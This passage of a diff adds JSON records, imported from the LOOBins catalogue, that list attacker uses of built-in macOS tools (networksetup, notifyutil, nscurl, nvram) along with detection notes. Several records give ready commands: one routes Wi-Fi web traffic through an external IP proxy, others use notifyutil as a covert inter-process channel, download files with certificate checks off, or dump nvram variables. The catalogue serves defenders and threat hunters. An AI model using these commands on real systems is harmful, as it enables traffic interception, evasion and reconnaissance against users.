"/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:networksetup:f68761716a8e9334", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "Detect connected network hardware", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "networksetup -detectnewhardware", + "description": "Use networksetup to detect new network hardware and create a default network service on the hardware.", + "mitre": [], + "fullPath": [ + "/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:networksetup:fd6b13ad5483ff20", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "network device enumeration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "networksetup -listallhardwareports", + "description": "Use networksetup to list all network interfaces, providing name, device name, MAC address.", + "mitre": [], + "fullPath": [ + "/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:networksetup:168eb6a8aa332846", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "network device enumeration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "networksetup -listallnetworkservices", + "description": "Use networksetup to list all network interface names.", + "mitre": [], + "fullPath": [ + "/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:networksetup:5dbb2383ccf4021d", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "DNS server enumeration", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "networksetup -getdnsservers Wi-Fi", + "description": "Use networksetup to get configured DNS servers for a specific interface.", + "mitre": [], + "fullPath": [ + "/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:networksetup:7fbf514f694271c4", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "Enumerate configured web proxy URL for an interface", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "networksetup -getautoproxyurl \"Thunderbolt Ethernet\"", + "description": "Displays web proxy auto-configuration information for the specified interface.", + "mitre": [], + "fullPath": [ + "/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:networksetup:e8c626b275630b8f", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "Enumerate configured web proxy for an interface", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "networksetup -getwebproxy \"Wi-Fi\"", + "description": "Displays standard web proxy information for the specified interface.", + "mitre": [], + "fullPath": [ + "/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:networksetup:f00af425358c2200", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "Set the https web proxy for an interface", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Command and Control" + ], + "command": "networksetup -setsecurewebproxy \"Wi-Fi\" 46.226.108.171", + "description": "Use networksetup to set the https web proxy for an interface.", + "mitre": [], + "fullPath": [ + "/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:networksetup:7010ec9c106f3c12", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "Set the http web proxy for an interface", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Command and Control" + ], + "command": "networksetup -setwebproxy \"Wi-Fi\" 46.226.108.171", + "description": "Use networksetup to set the http web proxy for an interface.", + "mitre": [], + "fullPath": [ + "/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:networksetup:4a75ab18d02eb5be", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "Set auto proxy URL for an interface", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Command and Control" + ], + "command": "networksetup -setautoproxyurl \"Wi-Fi\" $autoProxyURL", + "description": "Use networksetup to set the proxy URL for an interface.", + "mitre": [], + "fullPath": [ + "/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:networksetup:0365fc892ea9ebd8", + "toolId": "loobins:networksetup", + "toolName": "networksetup", + "name": "Enable auto proxy state", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Command and Control" + ], + "command": "networksetup -setautoproxystate \"Wi-Fi\" on", + "description": "Use networksetup to enable the proxy auto-config", + "mitre": [], + "fullPath": [ + "/usr/sbin/networksetup" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml", + "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", + "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be", + "https://objective-see.org/blog/blog_0x25.html", + "https://objective-see.org/blog/blog_0x26.html", + "https://objective-see.org/blog/blog_0x6D.html", + "https://objective-see.org/blog/blog_0x3C.html", + "https://objective-see.org/blog/blog_0x6E.html" + ] + }, + { + "id": "loobins:notifyutil:a49f967a5200e4d3", + "toolId": "loobins:notifyutil", + "toolName": "notifyutil", + "name": "Monitor system events for reconnaissance", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery", + "Collection" + ], + "nativeCategory": [ + "Discovery", + "Collection" + ], + "command": "notifyutil -w com.apple.screenIsLocked", + "description": "An attacker can register for system notification keys to detect when the user locks their screen, changes network state, or other system events without using more easily detected APIs. The following example monitors for screen lock events.", + "mitre": [], + "fullPath": [ + "/usr/bin/notifyutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Monitor notifyutil execution with suspicious notification keys", + "value": "Monitor notifyutil execution with suspicious notification keys" + }, + { + "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", + "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" + }, + { + "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", + "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" + }, + { + "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", + "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", + "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", + "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", + "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" + ] + }, + { + "id": "loobins:notifyutil:891e0dc874fbdd11", + "toolId": "loobins:notifyutil", + "toolName": "notifyutil", + "name": "Establish covert inter-process communication channel", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Command and Control", + "Defense Evasion" + ], + "command": "# Sender process\nnotifyutil -p com.example.hidden.channel -s com.example.hidden.channel 1337\n\n# Receiver process in another terminal/process\nnotifyutil -1 com.example.hidden.channel -g com.example.hidden.channel", + "description": "Threat actors can use Darwin notifications as a covert IPC mechanism to coordinate between malicious processes. By posting and monitoring custom notification keys with associated state values, malware components can exchange commands and data without using traditional IPC methods that may be monitored.", + "mitre": [], + "fullPath": [ + "/usr/bin/notifyutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Monitor notifyutil execution with suspicious notification keys", + "value": "Monitor notifyutil execution with suspicious notification keys" + }, + { + "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", + "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" + }, + { + "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", + "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" + }, + { + "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", + "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", + "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", + "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", + "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" + ] + }, + { + "id": "loobins:notifyutil:45163e0090184fa4", + "toolId": "loobins:notifyutil", + "toolName": "notifyutil", + "name": "Monitor network state changes for data exfiltration timing", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery", + "Collection" + ], + "nativeCategory": [ + "Discovery", + "Collection" + ], + "command": "notifyutil -w com.apple.system.config.network_change", + "description": "An attacker can monitor for network configuration changes to determine optimal timing for data exfiltration. This allows malware to detect when the system connects to networks and adjust behavior accordingly.", + "mitre": [], + "fullPath": [ + "/usr/bin/notifyutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Monitor notifyutil execution with suspicious notification keys", + "value": "Monitor notifyutil execution with suspicious notification keys" + }, + { + "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", + "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" + }, + { + "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", + "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" + }, + { + "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", + "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", + "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", + "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", + "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" + ] + }, + { + "id": "loobins:notifyutil:687e08d3b386a66e", + "toolId": "loobins:notifyutil", + "toolName": "notifyutil", + "name": "Monitor timezone changes for geolocation tracking", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection", + "Discovery" + ], + "nativeCategory": [ + "Collection", + "Discovery" + ], + "command": "notifyutil -w com.apple.system.timezone", + "description": "Monitoring timezone change notifications can help an attacker track when a target device moves between geographic locations or when users travel, providing intelligence about the target's physical location and movement patterns.", + "mitre": [], + "fullPath": [ + "/usr/bin/notifyutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Monitor notifyutil execution with suspicious notification keys", + "value": "Monitor notifyutil execution with suspicious notification keys" + }, + { + "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", + "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" + }, + { + "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", + "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" + }, + { + "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", + "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", + "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", + "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", + "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" + ] + }, + { + "id": "loobins:notifyutil:c44dbcefe0e67951", + "toolId": "loobins:notifyutil", + "toolName": "notifyutil", + "name": "Monitor login/logout events for privilege escalation timing", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery", + "Privilege Escalation" + ], + "nativeCategory": [ + "Discovery", + "Privilege Escalation" + ], + "command": "notifyutil -w com.apple.loginwindow.logout -w com.apple.springboard.attemptactivationend", + "description": "By monitoring authentication-related notification keys, an attacker can detect login and logout events to time privilege escalation attempts or other malicious activities when defenses may be weakened during authentication transitions.", + "mitre": [], + "fullPath": [ + "/usr/bin/notifyutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Monitor notifyutil execution with suspicious notification keys", + "value": "Monitor notifyutil execution with suspicious notification keys" + }, + { + "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", + "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" + }, + { + "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", + "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" + }, + { + "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", + "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", + "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", + "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", + "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" + ] + }, + { + "id": "loobins:notifyutil:1b0af23ae08ae744", + "toolId": "loobins:notifyutil", + "toolName": "notifyutil", + "name": "Query system notification state values for reconnaissance", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "notifyutil -g com.apple.system.timezone\nnotifyutil -g com.apple.loginwindow.logout\nnotifyutil -g com.apple.screenIsLocked", + "description": "Threat actors can query state values of system notification keys to gather information about the current system configuration without executing more suspicious commands.", + "mitre": [], + "fullPath": [ + "/usr/bin/notifyutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Monitor notifyutil execution with suspicious notification keys", + "value": "Monitor notifyutil execution with suspicious notification keys" + }, + { + "type": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)", + "value": "Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)" + }, + { + "type": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)", + "value": "Monitor long-running notifyutil processes (using -w flag for sustained monitoring)" + }, + { + "type": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes", + "value": "Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml", + "https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/", + "https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html", + "https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html" + ] + }, + { + "id": "loobins:nscurl:5b4e238d88fa7cf3", + "toolId": "loobins:nscurl", + "toolName": "nscurl", + "name": "Download file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion", + "Command and Control" + ], + "command": "nscurl -k https://google.com -o /private/tmp/google", + "description": "Download file and ignore cert checking", + "mitre": [], + "fullPath": [ + "/usr/bin/nscurl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect all curl and nscurl activity", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/all_curl_activity" + }, + { + "type": "Jamf Protect: Detect file downloads using the insecure argument for curl and nscurl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/file_download_curl_insecure" + }, + { + "type": "Sigma: File Download Via Nscurl - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nscurl.yml", + "https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl", + "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos" + ] + }, + { + "id": "loobins:nscurl:ee54398ef9eb9eff", + "toolId": "loobins:nscurl", + "toolName": "nscurl", + "name": "Download file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion", + "Command and Control" + ], + "command": "nscurl https://google.com -dl", + "description": "Download file to the Downloads directory using -dl", + "mitre": [], + "fullPath": [ + "/usr/bin/nscurl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect all curl and nscurl activity", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/all_curl_activity" + }, + { + "type": "Jamf Protect: Detect file downloads using the insecure argument for curl and nscurl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/file_download_curl_insecure" + }, + { + "type": "Sigma: File Download Via Nscurl - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nscurl.yml", + "https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl", + "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos" + ] + }, + { + "id": "loobins:nscurl:5e3b292edcfd8e16", + "toolId": "loobins:nscurl", + "toolName": "nscurl", + "name": "Download file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Defense Evasion" + ], + "nativeCategory": [ + "Defense Evasion", + "Command and Control" + ], + "command": "nscurl https://google.com -dir /private/tmp/google", + "description": "Download file to a designated directory using -dir", + "mitre": [], + "fullPath": [ + "/usr/bin/nscurl" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Jamf Protect: Detect all curl and nscurl activity", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/all_curl_activity" + }, + { + "type": "Jamf Protect: Detect file downloads using the insecure argument for curl and nscurl", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/file_download_curl_insecure" + }, + { + "type": "Sigma: File Download Via Nscurl - MacOS", + "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_nscurl_usage.yml" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nscurl.yml", + "https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl", + "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos" + ] + }, + { + "id": "loobins:nvram:0d1e2b7144728348", + "toolId": "loobins:nvram", + "toolName": "nvram", + "name": "Get nvram variables", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "nvram -p", + "description": "The -p option prints all the nvram variables that contain some potentially sensitive information like WiFi SSIDs and Bluetooth devices.", + "mitre": [], + "fullPath": [ + "/usr/sbin/nvram" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing.", + "value": "No detections at time of publishing." + } + ], + "references": [ + 